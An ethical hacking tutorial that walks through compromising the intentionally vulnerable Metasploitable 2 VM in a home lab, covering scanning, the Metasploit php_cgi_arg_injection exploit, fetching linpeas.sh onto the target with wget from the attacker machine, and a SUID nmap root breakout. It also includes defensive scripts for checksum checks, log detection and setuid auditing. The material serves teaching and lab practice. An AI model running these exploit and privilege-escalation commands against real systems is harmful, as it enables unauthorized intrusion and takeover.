Anatomy of a Penetration Test with Metasploitable 2

This guide is an introduction to ethical hacking with Metasploitable 2 from Rapid7. This content is part of our upcoming Ethical Hacking Crash Course.

The following topics will be covered to give you the complete process from enumeration to obtaining root access onto a Linux machine:

  • Lab and Tools Setup
    • VirtualBox Install
    • NatNetwork Setup
    • Kali Linux VM Setup
    • Metasploitable 2 Setup
  • Enumeration Methods
    • nmap
    • rustscan
    • nuclei
    • gobuster
  • Initial Foothold
    • Exploit DB
    • Metasploit
    • Python Shell Upgrade
  • Privilege Escalation Methods
    • linPEAS
    • GTFOBins

VirtualBox Install

First, we will download VirtualBox so we can set up the Kali Linux and Metasploitable 2 lab.

Go here: https://www.virtualbox.org/wiki/Downloads

Select the installer for your platform. In my case, I have installed VirtualBox onto a Windows host. Before running the installer, make sure the downloaded file matches the SHA256 checksum published on the VirtualBox download page (there is a link to the checksums on the same page). Run one of the following commands to compute the SHA256 hash and confirm it matches; this protects you from running a tampered copy of the file. Do the same for every VirtualBox installer or VM image you download in future, such as Kali Linux and Metasploitable 2.

For Windows
CertUtil -hashfile 'file.exe' sha256

For Linux
sha256sum file.deb
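The check above, scripted so it can be reused for every download: an added example, not code from the original post. It reads the vendor's SHA256SUMS file (lines of the form "hash  name" or "hash *name"), compares the listed digest with the one computed from the file on disk, and refuses a mismatch. The helper names and the demo files are constructed.

```shell
#!/bin/sh
# Added example: verify a downloaded installer against the vendor's SHA256SUMS
# file before running it (hypothetical helpers, not from the original post).

# expected_sha256 SUMSFILE NAME -> prints the hex digest listed for NAME (or nothing)
expected_sha256() {
  awk -v name="$2" '
    { f = $2; sub(/^\*/, "", f)          # drop the binary-mode "*" marker
      if (f == name) { print tolower($1); exit } }' "$1"
}

# actual_sha256 FILE -> prints the digest of the file on disk
actual_sha256() {
  if command -v sha256sum >/dev/null 2>&1; then
    sha256sum "$1" | awk '{ print tolower($1) }'
  else
    shasum -a 256 "$1" | awk '{ print tolower($1) }'   # macOS hosts
  fi
}

# verify_download FILE SUMSFILE -> 0 if the digests match, 1 otherwise
verify_download() {
  want=$(expected_sha256 "$2" "$(basename "$1")")
  if [ -z "$want" ]; then
    echo "no entry for $(basename "$1") in $2" >&2
    return 1
  fi
  got=$(actual_sha256 "$1")
  if [ "$got" = "$want" ]; then
    echo "OK: $1"
    return 0
  fi
  echo "MISMATCH: $1 (expected $want, got $got)" >&2
  return 1
}

# Demo on constructed files (not real installers): "hello\n" has a known digest,
# and tampered.exe deliberately does not match the digest listed for it.
demo_dir=$(mktemp -d)
printf 'hello\n' > "$demo_dir/installer.exe"
cp "$demo_dir/installer.exe" "$demo_dir/tampered.exe"
printf '%s\n' \
  '5891b5b522d5df086d0ff0b110fbd9d21bb4fc7163af34d08286a2e846f6be03 *installer.exe' \
  '0000000000000000000000000000000000000000000000000000000000000000 *tampered.exe' \
  > "$demo_dir/SHA256SUMS"
verify_download "$demo_dir/installer.exe" "$demo_dir/SHA256SUMS"
verify_download "$demo_dir/tampered.exe" "$demo_dir/SHA256SUMS" || echo "refusing to run tampered.exe"
```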

NatNetwork Setup

Next, we must set up a NatNetwork so that the Kali Linux VM can reach the Metasploitable 2 box for testing. To do that, select “Tools” from the VirtualBox menu and create a new NatNetwork, following the settings in the screenshot below to configure your subnet:

The NatNetwork will be called LocalLabNetwork.

Kali Linux VM Setup

We will now install the Kali Linux VM in VirtualBox. Go to https://www.kali.org/get-kali/ and download the VirtualBox image for Kali Linux (64-bit, or whichever architecture matches your host machine). Make sure to check the SHA256 hash with the previous commands and confirm that it matches.

Unzip the contents of the downloaded zip file into a folder. On VirtualBox, click the “Add” button and search for the .vbox file in your folder:

The Kali VM instance will appear on your VirtualBox VM list:

Make sure to allocate at least 4 GB of RAM and at least 4 CPUs to this machine.

Right-click on it and select the Network settings. Go to the Adapter 2 tab and enable the network adapter. Attach it to NAT Network and select LocalLabNetwork, which you created previously.

After that, select “Start” or double click on your Kali machine in the list.

You will then reach the Kali login screen. To log in, use kali:kali

Before we begin using your new Kali VM, make sure to run the following command to update your Kali VM instance:

sudo apt-get update && sudo apt-get upgrade

Make sure to change your password with passwd. In a real environment this adds at least one extra layer of security and prevents a threat actor on the same network from logging into your machine with the default credentials.

Metasploitable 2 VM Setup

To download Metasploitable 2, go to the Rapid7 page below and fill out the form to download the VM:
https://docs.rapid7.com/metasploit/metasploitable-2/

As with the Kali VM, unzip the contents to a folder on your host machine. The important file to note is the .vmdk file.

Go to VirtualBox, click “New”, configure the VM as in the screenshot below, and make sure to select the folder path where the VM will reside on your host machine.

Keep the default settings and hit “Next” until you reach the screen where you must select a .vmdk file. Select the Metasploitable.vmdk file from the previous screenshot and hit “Next” until you finish.

You will now see both your Kali box and Metasploitable box on the VirtualBox list.

As before, you must add Metasploitable 2 to the same NatNetwork as your Kali box so the two can communicate with each other.

Now, save the settings and hit “Start” to run Metasploitable 2.

The login for this box is msfadmin:msfadmin

You should now have access to the machine.

Next, run ifconfig and note the target IP. We will use it from our Kali machine to test access to the Metasploitable box.

NOTE: If the 192.* subnet does not appear, you may need to go to the network settings and disable any other network adapters attached to the Metasploitable 2 machine.

Test Connection

Run the following ping command to see if you receive a response back and confirm you can now reach the Metasploitable machine:

ping -c 4 Metasploitable_IP_address

Enumeration

Before we begin enumeration we will make sure we have the following tools installed:

  • rustscan
  • nuclei
  • gobuster
  • seclists

Use the following commands to install each tool:

For rustscan:
mkdir ~/tools
wget https://github.com/RustScan/RustScan/releases/download/2.0.1/rustscan_2.0.1_amd64.deb -P /home/kali/tools
sudo dpkg -i /home/kali/tools/rustscan_2.0.1_amd64.deb

For nuclei:
sudo apt-get install nuclei

For gobuster:
sudo apt-get install gobuster

For the seclists wordlist:
sudo apt-get install seclists

We will also update searchsploit/exploitdb with the following:
searchsploit -u

nmap

We will begin with an nmap service scan against the target:
nmap -sVC 192.168.100.12

This is a standard scan (-sV for version detection, -sC for the default scripts). It scans the top 1000 ports and gives us details on the services running on them, as shown in the scan output.

rustscan

We will now use rustscan, a very fast port scanner written in Rust. It still hands the results to nmap, but it will scan all ports quickly and give you data fast on a time-sensitive engagement. This is also useful for finding services hidden on uncommon ports.

rustscan -a 192.168.100.12 --ulimit 5000 --range 1-65535 -- -sVC -Pn

nuclei

Next, we will run nuclei, a community-powered tool, to scan the target for known CVEs and other vulnerabilities. Nuclei uses YAML templates written by other hackers in the community to find potential web or host vulnerabilities. You can extend it by adding more templates, but that is beyond the scope of this crash course.

nuclei -u 192.168.100.12

The output shows several potential footholds.

gobuster

Navigating to the target IP in your browser, we can see there is a web server hosted on port 80.

We will now do directory busting to search for potentially sensitive exposed files or directories that we can use to gather information about the target and get a foothold.

gobuster dir -k -u http://192.168.100.12/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x txt,php,html -t 40

We see a page of interest at /phpinfo.php.

Initial Foothold

Based on the information gathered in our enumeration, we can see there are several paths to potentially exploit the target. We will focus on CVE-2012-1823.

This CVE appeared in the nuclei output, and checking the PHP version confirms there is a well-known exploit against this service.

A quick Google search confirms this.

Checking Exploit-DB or running searchsploit also lists it.

We are interested in the Metasploit module, as this can give us quick shell access to the target.
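A defender-side check for the request shape behind CVE-2012-1823, added here as an example and not part of the original post: php-cgi treated a query string that contains no literal "=" as command-line arguments, so a query that begins with "-" (or its URL-encoded form %2d) and has no literal "=" is the indicator to alert on in web server logs. The function names, the IPs and the log lines are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): flag requests matching the
# CVE-2012-1823 argument-injection shape in combined-format access logs on stdin.
flag_php_cgi_arg_injection() {
  awk -F'"' '
    {
      split($2, req, " ")          # "METHOD URI PROTO" -> req[2] is the URI
      uri = req[2]
      qpos = index(uri, "?")
      if (qpos == 0) next          # no query string at all
      q = substr(uri, qpos + 1)
      if (q == "" || index(q, "=") > 0) next   # a literal "=" disables argv parsing
      if (q ~ /^(-|%2[dD])/) print $0          # query passed to php-cgi as an option
    }'
}

# count_flagged LOGFILE -> number of suspicious lines, for scripting/alerting
count_flagged() {
  flag_php_cgi_arg_injection < "$1" | wc -l | tr -d ' '
}

# Constructed sample log (placeholder IPs), not captured from a real server.
# Lines 3 and 4 should be flagged; line 5 has a "-" but inside a normal key=value.
sample_log=$(mktemp)
cat > "$sample_log" <<'EOF'
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /phpinfo.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?-s HTTP/1.1" 200 1024 "-" "curl/7.88"
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "POST /index.php?%2dd+display_errors%3d1 HTTP/1.1" 200 64 "-" "curl/7.88"
10.0.0.5 - - [01/Jan/2024:10:00:04 +0000] "GET /search.php?q=-foo HTTP/1.1" 200 300 "-" "Mozilla/5.0"
EOF
flag_php_cgi_arg_injection < "$sample_log"
echo "flagged: $(count_flagged "$sample_log")"
```

The fix on the server side is the patched PHP release, or a rewrite rule that rejects query strings beginning with "-" on php-cgi handlers; the check above is for confirming whether such requests reached a host.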

Metasploit

We will now start the Metasploit console with the following command:
msfconsole

We will run the following command to search for the module:

search php cgi injection

We are interested in exploit/multi/http/php_cgi_arg_injection. Simply run either of the commands:

use exploit/multi/http/php_cgi_arg_injection
or
use 22

Specifying the number from the search list is an easy way to load the module.

Once the module is loaded, run info first to check the description and make sure we are using the correct exploit. This is important: using the wrong module, one capable of taking down a network via a DoS attack, can have major consequences during an engagement. Always make sure you are using the correct tool before you use it.

We will now check which parameters are required to run the exploit by running the options command:

We will run the following commands to specify the target (RHOSTS) and our listener (LHOST). The default LHOST may not always work. In our scenario, we must change it to the 192.* IP, because that address is on the same subnet and allows us to reach the Metasploitable 2 machine.

Run the following commands:

set rhosts 192.168.100.12
set lhost 192.168.100.11

NOTE: Check your attacker IP by running ifconfig on your Kali machine; it should be the one starting with 192.*

We will now run the module against the target to get a low privileged shell:
run -j

The -j flag runs the module as a background job. This is useful when you are on a network with multiple targets you need to test at once with Metasploit.

We get a meterpreter session on session 1:

To interact with the meterpreter session, we must run the following:
sessions 1

We have access to the target as the www-data user:

To drop into a shell on the target, run the shell command.

Privesc

We will now attempt to escalate privileges on the target and gain root access.

First, we need to upgrade the shell with a Python one-liner to get a fully interactive terminal:

python -c 'import pty;pty.spawn("/bin/bash")'

File Transfer

To find potential privesc paths, we will need to upload the linpeas.sh script from here:
https://github.com/carlospolop/PEASS-ng

Download the linpeas.sh file from their releases page to a folder on your Kali machine, which you will serve from during the transfer.

cd server
wget https://github.com/carlospolop/PEASS-ng/releases/download/20231112-0a42c550/linpeas.sh

To initiate the transfer, we make that folder available on the network using Python's http.server module. Run the following command, and be sure to note the IP of your attack machine on the network:

python3 -m http.server 80

Your Python server will be listening on port 80 and can be accessed over HTTP from a browser.

In the Metasploit session where you currently have a shell on the target, first cd into the /tmp folder, which most of the time will let a low-privilege account write downloaded files, then run the wget command:

cd /tmp
wget http://192.168.100.11:80/linpeas.sh

Host Enumeration with linPEAS

To run linpeas.sh, we must first grant execute permission on the file:

chmod +x linpeas.sh

Now we should be able to run the script:

./linpeas.sh

linPEAS gives us a wealth of information and potential privesc paths; the legend explains the color coding used to identify them. Most of the red color-coded text will point you to a path to gain root access on the target. However, occasionally red/yellow color-coded text can also prove to be a high-likelihood route to elevated privileges.

GTFOBins – shell breakout

One of the paths we see on this machine is a potential SUID breakout via an older version of nmap installed on the machine.

We can visit GTFOBins at https://gtfobins.github.io/ and search for nmap.

The page shows there is a way for us to break out of the shell and gain root access to the target. This is because the nmap binary has the SUID (setuid) bit set, which allows the binary to be executed as the root user.

From the instructions on the page we run the following commands:

nmap --interactive
!sh

Running whoami, we verify that we are the root user.
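The hardening check that catches this before anyone needs GTFOBins, added here as an example (not from the original post or from GTFOBins): list the setuid binaries on a host and report any that are not on an approved baseline, so a setuid nmap shows up in an audit rather than in a privesc. The helper names, the sample file list and the baseline are constructed.

```shell
#!/bin/sh
# Added example (not from the original post): audit setuid binaries against an
# approved baseline (hypothetical helpers).

# list_suid_binaries -> setuid regular files on local filesystems, one per line
list_suid_binaries() {
  find / -xdev -type f -perm -4000 2>/dev/null | sort
}

# unexpected_suid CANDIDATES BASELINE -> paths in CANDIDATES absent from BASELINE
# (both are text files with one absolute path per line)
unexpected_suid() {
  baseline_sorted=$(mktemp)
  sort -u "$2" > "$baseline_sorted"
  sort -u "$1" | comm -23 - "$baseline_sorted"   # lines only in the candidates
  rm -f "$baseline_sorted"
}

# Constructed sample: the kind of list list_suid_binaries would return on a lab
# host, and a baseline of setuid binaries a stock install is expected to carry.
# On a real host you would run: list_suid_binaries > found.txt
work=$(mktemp -d)
cat > "$work/found.txt" <<'EOF'
/bin/ping
/bin/su
/usr/bin/nmap
/usr/bin/passwd
/usr/bin/sudo
EOF
cat > "$work/baseline.txt" <<'EOF'
/bin/ping
/bin/su
/usr/bin/passwd
/usr/bin/sudo
EOF
echo "setuid binaries outside the baseline:"
unexpected_suid "$work/found.txt" "$work/baseline.txt"
# Remediation for an unexpected entry is to clear the bit (chmod u-s PATH) once
# you have confirmed nothing legitimately needs it, then re-run the audit.
```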

Conclusion

In conclusion, compromising a target requires proper enumeration and research to find potential footholds and privilege escalation paths. Many tools can help with this, but diligence is required to chain different events, vulnerabilities and issues together in order to gain complete access.

If you like my content and want to support, check out some cool hacker swag at my shop here: http://hiddendoorsecurity.com/shop

– Z333RO
